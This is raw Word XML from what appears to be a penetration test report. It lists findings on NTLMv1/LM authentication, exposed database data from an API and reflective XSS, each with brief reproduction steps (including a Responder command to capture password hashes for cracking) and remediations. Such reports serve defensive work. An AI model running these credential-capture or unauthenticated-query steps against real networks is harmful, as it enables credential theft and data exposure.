          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">gain control of </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7BB289E5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>higher privileged user accounts on the network.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="5BAA6D5C" w14:textId="7CA6911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6FA06256" w14:textId="6066732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CE6B94E" w:rsidP="0D325B6E" w:rsidRDefault="5CE6B94E" w14:paraId="6D1CF82F" w14:textId="3E55C37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Step 1: Identify the current LAN Manager authentication level </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5CE6B94E" w:rsidP="0D325B6E" w:rsidRDefault="5CE6B94E" w14:paraId="494149CE" w14:textId="28E90FF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HKLM\SYSTEM\CurrentControlSet\Control\Lsa\LMCompatibilityLevel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5CE6B94E" w:rsidP="0D325B6E" w:rsidRDefault="5CE6B94E" w14:paraId="4E2E435E" w14:textId="09AD104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2: Run Responder to capture authentication attempts</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="5CE6B94E" w:rsidP="0D325B6E" w:rsidRDefault="5CE6B94E" w14:paraId="5F8FEED4" w14:textId="1F2B34A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Python3 responder.py -I eth0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5CE6B94E" w:rsidP="0D325B6E" w:rsidRDefault="5CE6B94E" w14:paraId="7478D252" w14:textId="0746296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3: Capture the NTLMv1 or LM hashes from authentication traffic</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5CE6B94E" w:rsidP="0D325B6E" w:rsidRDefault="5CE6B94E" w14:paraId="536D109C" w14:textId="66127D3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4: Crack the captured hash using hashcat or associated tool to recover plaintext password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="44A1BD19" w14:textId="175C0A0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1F7F06F7" w14:textId="66D18C0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CE6B94E" w:rsidP="0D325B6E" w:rsidRDefault="5CE6B94E" w14:paraId="621C2DCD" w14:textId="20AD524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CE6B94E" w:rsidP="0D325B6E" w:rsidRDefault="5CE6B94E" w14:paraId="7F973C62" w14:textId="38D3F292">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Set the security policy "Network security: LAN Manager authentication level" to "Send NTLMv2 response only. Refuse LM &amp;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NTLM" (level 5)</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on all domain controllers and member systems via Group Policy.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5CE6B94E" w:rsidP="0D325B6E" w:rsidRDefault="5CE6B94E" w14:paraId="212069A0" w14:textId="3E015CB6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="117"/>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Disable LLMNR if </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="464198E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>applicable,</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to prevent LLMNR Poisoning </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="5952CC67" w14:textId="5ED62351">
      <w:p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5CE6B94E" w:rsidP="0D325B6E" w:rsidRDefault="5CE6B94E" w14:paraId="36B0D94F" w14:textId="1BE242D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CE6B94E" w:rsidP="0D325B6E" w:rsidRDefault="5CE6B94E" w14:paraId="45F9789E" w14:textId="17D2D31E">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5038a8ef7b2d46e8">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="5CE6B94E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:strike w:val="0"/>
            <w:dstrike w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Microsoft - Network security: LAN Manager authentication level</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="1978EA73" w14:textId="193E6274">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2058BB5" w14:textId="3A1FEA96">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F4D6A00" w14:textId="663A40C3">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04F0610" w14:textId="002BA962">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5B09AF8" w14:textId="3C92DD3D">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6FDDFC86" w14:textId="31012372">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748B40C" w14:textId="57A1480B">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36391CAB" w14:textId="53598457">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3D5E422" w14:textId="543E4004">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DB2E0C2" w14:textId="0196E487">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73EB663" w14:textId="4037591B">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571B968" w14:textId="7EC52361">
      <w:pPr>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w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="3764CD32" w14:textId="360B6E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E6B94E" w:rsidP="0D325B6E" w:rsidRDefault="5CE6B94E" w14:paraId="7DCAC2A5" w14:textId="274424D0">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5CE6B94E">
        <w:rPr>
          <w:rFonts w:ascii="Aptos Display" w:hAnsi="Aptos Display" w:eastAsia="Aptos Display" w:cs="Aptos Display"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFC000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>▌</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5CE6B94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Exposed DB Data from API</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75"/>
        <w:gridCol w:w="4320"/>
      </w:tblGrid>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="7C284560">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CD536FD" w14:textId="6B4ABFED">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4F154D" w14:textId="0F86339B">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DF9B4F8" w14:textId="0255BED2">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A17CC27">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3B1C70" w14:textId="43BEEECC">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FBE0CC6" w14:textId="68435437">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:spacing w:after="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79827186" w14:textId="5D33EFF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6.9</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0FE19B4E" w14:textId="7505493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Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="0D9A79D8">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831E4B2" w14:textId="677D4D4E">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3E0F2C4" w14:textId="24AA86B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382A8DA3"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:sz="0"/>
              <w:left w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
              <w:bottom w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
              <w:right w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0A2DE948"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="5E970D92">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C9AA3A" w14:textId="58C37043">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5BD2551" w14:textId="53C7082F">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" r:id="Rb1d2ef93e6664e82">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="79AF1955">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E4A7E69" w14:textId="04B0A07B">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7DC22D1" w14:textId="52DD5863">
            <w:pPr>
              <w:bidi w:val="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ECA131B" w14:textId="33E41DE8">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="Rc11f8ad57b6346f0">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>T1567: Exfiltration Over Web Service</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="0BCDB0C0" w14:textId="27A193D5">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="Ra384acd70e0a44ca">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>T1213: Data from Information Repositories</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="2031220E">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4860BE84"/>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F3E774" w14:textId="5628737B">
            <w:pPr>
              <w:bidi w:val="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ED2193F" w14:textId="2367F3CD">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R4335b73ab0e747f7">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M1041: Encrypt Sensitive Information</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="1FF57887" w14:textId="2229B1E0">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R2982a3aab95c4397">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M1035: Limit Access to Resource Over Network</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="58627504">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88F1A4E" w14:textId="0CA43392">
            <w:pPr>
              <w:bidi w:val="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74827D7" w14:textId="416C11A3">
            <w:pPr>
              <w:bidi w:val="0"/>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2B5383DC" w14:textId="445D6EE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5CE6B94E" w:rsidP="0D325B6E" w:rsidRDefault="5CE6B94E" w14:paraId="506BB338" w14:textId="2A5EB1F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CE6B94E" w:rsidP="0D325B6E" w:rsidRDefault="5CE6B94E" w14:paraId="3F0936F1" w14:textId="5EFEB71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The exposed </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endpoint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allowed unauthorized users to query database information directly without proper authentication. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="6EE8078A" w14:textId="016EC2B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6472B62A" w14:textId="681BD1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5CE6B94E" w:rsidP="0D325B6E" w:rsidRDefault="5CE6B94E" w14:paraId="17FE5257" w14:textId="12785C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craft API requests to retrieve sensitive information directly from the database, including personally identifiable information (PII), credentials, internal system data, or business-critical information. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="3FD4677C" w14:textId="50AEB65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27E6F786" w14:textId="240D370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CE6B94E" w:rsidP="0D325B6E" w:rsidRDefault="5CE6B94E" w14:paraId="56E0646B" w14:textId="4154DA0F">
      <w:pPr>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Step 1: Identify </w:t>
      </w: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vulnerable endpoint</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web scanning or Burp Suite</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5CE6B94E" w:rsidP="0D325B6E" w:rsidRDefault="5CE6B94E" w14:paraId="76B94E1E" w14:textId="7D9CA750">
      <w:pPr>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2: Send unauthenticated GET or POST requests to the API endpoint</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5CE6B94E" w:rsidP="0D325B6E" w:rsidRDefault="5CE6B94E" w14:paraId="3B2C5903" w14:textId="71114D2F">
      <w:pPr>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Step 3: Observe the API responses for sensitive database fields such as email, password, or id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="4D988F85" w14:textId="7AF0F51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4CDD6FB" w14:textId="5B0C48F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5CE6B94E" w:rsidP="0D325B6E" w:rsidRDefault="5CE6B94E" w14:paraId="0265D47F" w14:textId="518F9FD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5CE6B94E" w:rsidP="0D325B6E" w:rsidRDefault="5CE6B94E" w14:paraId="7373B4AE" w14:textId="502A79A2">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5CE6B94E" w:rsidP="0D325B6E" w:rsidRDefault="5CE6B94E" w14:paraId="5741123E" w14:textId="2A0F9347">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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Implement authentication and authorization on all API endpoints that deal with sensitive information</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5EF74744">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5CE6B94E" w:rsidP="0D325B6E" w:rsidRDefault="5CE6B94E" w14:paraId="626186CC" w14:textId="0D73AC07">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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Implement en</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cryp</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tion</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6B811383">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at rest and during transfer </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0CFC4B18">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>of</w:t>
      </w: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 xml:space="preserve"> all sensitive data.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5CE6B94E" w:rsidP="0D325B6E" w:rsidRDefault="5CE6B94E" w14:paraId="059F0153" w14:textId="2351D7C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Enable comprehensive API logging and monitoring.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="323C4CF4" w14:textId="71F27ADA">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5CE6B94E" w:rsidP="0D325B6E" w:rsidRDefault="5CE6B94E" w14:paraId="3AAD92B3" w14:textId="023219F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E6B94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CE6B94E" w:rsidP="0D325B6E" w:rsidRDefault="5CE6B94E" w14:paraId="55D640DB" w14:textId="48180C4D">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="R9ad39276398b4037">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="5CE6B94E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:strike w:val="0"/>
            <w:dstrike w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>OWASP - API Security Top 10</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="5A928490" w14:textId="64AD0FA0">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="49B3B9AE" w14:textId="78E6C30C">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="4BC5F395" w:rsidP="0D325B6E" w:rsidRDefault="4BC5F395" w14:paraId="04A88E90" w14:textId="67CA782A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc322350694" w:id="574739488"/>
      <w:bookmarkStart w:name="_Toc557800052" w:id="1475092269"/>
      <w:bookmarkStart w:name="_Toc75031937" w:id="1725850693"/>
      <w:bookmarkStart w:name="_Toc1263003937" w:id="375357120"/>
      <w:bookmarkStart w:name="_Toc70792880" w:id="50171663"/>
      <w:bookmarkStart w:name="_Toc1123306740" w:id="1699912045"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4BC5F395">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Low Vulnerability</w:t>
      </w:r>
      <w:bookmarkEnd w:id="574739488"/>
      <w:bookmarkEnd w:id="1475092269"/>
      <w:bookmarkEnd w:id="1725850693"/>
      <w:bookmarkEnd w:id="375357120"/>
      <w:bookmarkEnd w:id="50171663"/>
      <w:bookmarkEnd w:id="1699912045"/>
    </w:p>
    <w:p w:rsidR="2D598BD5" w:rsidP="0D325B6E" w:rsidRDefault="2D598BD5" w14:paraId="1FEA39CB" w14:textId="49F1D000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc274906691" w:id="821584902"/>
      <w:bookmarkStart w:name="_Toc1697711655" w:id="1064808731"/>
      <w:bookmarkStart w:name="_Toc861869476" w:id="2059776094"/>
      <w:bookmarkStart w:name="_Toc253995685" w:id="2097414600"/>
      <w:bookmarkStart w:name="_Toc1321396624" w:id="1332158983"/>
      <w:bookmarkStart w:name="_Toc558730805" w:id="102474905"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2D598BD5">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="92D050"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>▌</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc265364820" w:id="418256676"/>
      <w:bookmarkStart w:name="_Toc1781094171" w:id="567703058"/>
      <w:bookmarkStart w:name="_Toc930883248" w:id="323572234"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="244CC041">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="26D42A52">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1: Reflective XSS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="418256676"/>
      <w:bookmarkEnd w:id="567703058"/>
      <w:bookmarkEnd w:id="323572234"/>
      <w:bookmarkEnd w:id="821584902"/>
      <w:bookmarkEnd w:id="1064808731"/>
      <w:bookmarkEnd w:id="2059776094"/>
      <w:bookmarkEnd w:id="2097414600"/>
      <w:bookmarkEnd w:id="1332158983"/>
      <w:bookmarkEnd w:id="102474905"/>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590"/>
        <w:gridCol w:w="2490"/>
        <w:gridCol w:w="4335"/>
      </w:tblGrid>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="0DD8C0B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D9A0F0" w14:textId="04DCB0A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423E591" w14:textId="79FCDA3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6B63595" w14:textId="5BDA1E6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3A2B5B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ADC7DC" w14:textId="4E96A6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33CC3A2" w14:textId="4F0D0766">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1C849235" w14:textId="5FE2A674">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4</w:t>
            </w:r>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="60"/>
                <w:szCs w:val="60"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="60"/>
                <w:szCs w:val="60"/>
              </w:rPr>
              <w:t>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727DDD94" w:rsidP="0D325B6E" w:rsidRDefault="727DDD94" w14:paraId="2640868A" w14:textId="17152C70">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:suppressLineNumbers w:val="0"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="727DDD94">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
